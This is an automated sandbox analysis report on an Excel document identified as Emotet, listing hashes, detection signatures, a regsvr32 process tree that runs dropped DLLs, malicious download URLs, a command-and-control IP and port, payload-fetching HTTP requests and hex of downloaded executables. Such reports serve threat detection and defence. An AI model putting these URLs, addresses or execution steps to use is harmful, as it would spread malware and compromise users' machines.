Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DETAILS 25922194612.xls

Overview

General Information

Sample Name:DETAILS 25922194612.xls
Analysis ID:632071
MD5:3cfaa4009799dc19f12161241bbf7b03
SHA1:f36b5b095c84f4cf7e01eaf23de008a3362843a8
SHA256:96eaa313abb56196eea9e8c4c20f78166b79894652e1cff740729d17aace22f0
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0, Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1200 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 2552 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1832 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KuSAkvGE\rWFJGQNl.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1472 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1680 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\Ejpzh\qlDqXeGagKnBKzd.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1956 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1972 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FiPeSYwmr\Wuiko.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1424 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PLVmoWLosZJQb\bTjwWDTWvnC.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2076 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.1219777301.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000007.00000002.1218923490.00000000002C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.935437838.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        0000000A.00000002.950850615.00000000002C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000005.00000002.935123835.00000000003E0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.regsvr32.exe.2c0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              3.2.regsvr32.exe.300000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                10.2.regsvr32.exe.2c0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  9.2.regsvr32.exe.150000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    5.2.regsvr32.exe.3e0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 11 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: DETAILS 25922194612.xlsReversingLabs: Detection: 41%
                      Antivirus detection for URL or domain
                      Source: http://learnviaonline.com/wp-admin/qGb/Avira URL Cloud: Label: malware
                      Source: http://milanstaffing.com/images/D4TRnDubF/Avira URL Cloud: Label: malware
                      Source: http://kolejleri.com/wp-admin/REvup/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URL
                      Source: kolejleri.comVirustotal: Detection: 11%Perma Link
                      Source: milanstaffing.comVirustotal: Detection: 6%Perma Link
                      Source: learnviaonline.comVirustotal: Detection: 8%Perma Link
                      Source: stainedglassexpress.comVirustotal: Detection: 5%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllReversingLabs: Detection: 60%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr1.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr2.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr3.ocxReversingLabs: Detection: 58%
                      Source: C:\Users\user\uxevr4.ocxMetadefender: Detection: 28%Perma Link
                      Source: C:\Users\user\uxevr4.ocxReversingLabs: Detection: 60%
                      Source: C:\Windows\System32\Ejpzh\qlDqXeGagKnBKzd.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\FiPeSYwmr\Wuiko.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\KuSAkvGE\rWFJGQNl.dll (copy)ReversingLabs: Detection: 58%
                      Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)Metadefender: Detection: 28%Perma Link
                      Source: C:\Windows\System32\PLVmoWLosZJQb\bTjwWDTWvnC.dll (copy)ReversingLabs: Detection: 60%
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr3.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr1.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr4.ocxJoe Sandbox ML: detected
                      Source: C:\Users\user\uxevr2.ocxJoe Sandbox ML: detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,9_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,11_2_000000018000BEF0

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (drops PE files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: Jf8[1].dll.0.drJump to dropped file
                      Document exploit detected (creates forbidden files)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Jf8[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4HWP0KQI[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\1Cb5zOjLgWGDemz55C5[1].dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T35PENELLOsp[1].dllJump to behavior
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
                      Document exploit detected (UrlDownloadToFile)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
                      Source: global trafficDNS query: name: learnviaonline.com
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 103.171.181.223:80

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.73.229 8080Jump to behavior
                      Source: Joe Sandbox ViewASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE MYLOC-ASIPBackboneofmyLocmanagedITAGDE
                      Source: Joe Sandbox ViewIP Address: 103.171.181.223 103.171.181.223
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:10:53 GMTServer: ApacheCache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:10:53 GMTContent-Disposition: attachment; filename="Jf8.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b337ddc562=1653289853; expires=Mon, 23-May-2022 07:11:53 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:10:53 GMTContent-Length: 371200Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:11:01 GMTServer: ApacheX-Powered-By: PHP/7.3.33Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:11:01 GMTContent-Disposition: attachment; filename="1Cb5zOjLgWGDemz55C5.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3385b2519=1653289861; expires=Mon, 23-May-2022 07:12:01 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:11:01 GMTContent-Length: 371200X-Content-Type-Options: nosniffVary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhkikkikkikk
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.0.33set-cookie: 628b33891c2fb=1653289865; expires=Mon, 23-May-2022 07:12:05 GMT; Max-Age=60; path=/cache-control: no-cache, must-revalidatepragma: no-cachelast-modified: Mon, 23 May 2022 07:11:05 GMTexpires: Mon, 23 May 2022 07:11:05 GMTcontent-type: application/x-msdownloadcontent-disposition: attachment; filename="T35PENELLOsp.dll"content-transfer-encoding: binarycontent-length: 371200date: Mon, 23 May 2022 07:11:05 GMTserver: LiteSpeedvary: User-AgentData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 f5 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 a2 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 06 00 00 04 00 00 c7 1d 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 b0 aa 02 00 84 00 00 00 e4 a1 02 00 50 00 00 00 00 00 03 00 fc e9 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 f0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc e9 02 00 00 00 03 00 00 ea 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 06 00 00 00 f0 05 00 00 08 00 00 00 a2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$
                      Source: global trafficHTTP traffic detected: GET /wp-admin/qGb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: learnviaonline.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/REvup/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kolejleri.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /classes/05SkiiW9y4DDGvb6/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: stainedglassexpress.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /images/D4TRnDubF/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: milanstaffing.comConnection: Keep-Alive
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 165.22.73.229:8080
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: unknownTCP traffic detected without corresponding DNS query: 165.22.73.229
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: regsvr32.exe, 00000004.00000002.1219527866.0000000002EE8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1219543284.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1219500540.00000000034B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1219513753.0000000002D50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000B.00000002.1219576591.0000000002CF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
